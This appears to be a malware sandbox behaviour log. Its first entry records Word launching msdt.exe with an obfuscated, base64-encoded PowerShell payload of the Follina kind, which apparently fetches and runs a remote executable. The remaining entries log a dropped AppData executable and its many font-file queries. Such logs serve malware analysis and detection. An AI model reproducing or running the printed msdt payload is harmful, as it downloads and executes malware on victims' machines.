Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process created: C:\Windows\SysWOW64\msdt.exe c:\windows\system32\msdt.exe" ms-msdt:/id pcwdiagnostic /skip force /param "it_rebrowseforfile=#6aw it_launchmethod=contextmenu it_browseforfile=4n0$(iex($(iex('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]0x22+'u1rpcc1wum9jrvntic1gt1jdzsattkftzsanbxnkdcc7jdggpsbbzgqtdflqzsattuvtqkvyzevgsu5pdglptianw0rsbeltcg9ydcgivxjmtw9ulmrsbcisienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigskcsc3ryaw5nifvxysxzdhjpbmcgcfksdwludcblyyxjbnrqdhigcnepoycglu5bbuugilfdiiatbmfnrvnwyunfigd1ic1qyxnzvghydtsgjdg6olvstervd25sb2fkvg9gawxlkdasimh0dhbzoi8vchpzcmjsb2cuy29tl3dwlwnvbnrlbnqvdxbsb2fkcy8ymdeyl1bst01ad0zwmzg1dlhyti5leguilcikrw5wokfquerbvefcufjptvp3rnazodv2whjolmv4zsismcwwktttdgfsvc1zbevlccgzkttjbnzpa0utsvrlbsaijgvudjpbufbeqvrbxfbst01ad0zwmzg1dlhyti5leguio3n0t3atufjpy2vtuyatzk9sy0uglw5hbwugj3nkawfnbmhvc3qn'+[char]0x22+'))'))))m3/../../../../../../../../../../../../../../../../.exe			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBBFF.tmp" "c:\Users\user\AppData\Local\Temp\yjsbg2wl\CSCC31FCDA79CE4E0C894720F359978C2.TMP"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC7C7.tmp" "c:\Users\user\AppData\Local\Temp\zf01cjt2\CSCBCE7B9C025BF4B8F8112717E4D466AA3.TMP"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE5AF.tmp" "c:\Users\user\AppData\Local\Temp\mnm1snwx\CSCC987513427A042F884BC2F5ADDB1C11C.TMP"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Process created: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe {path}	Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.accdb VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.laccdb VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.laccdb VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00116~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation	Jump to behavior
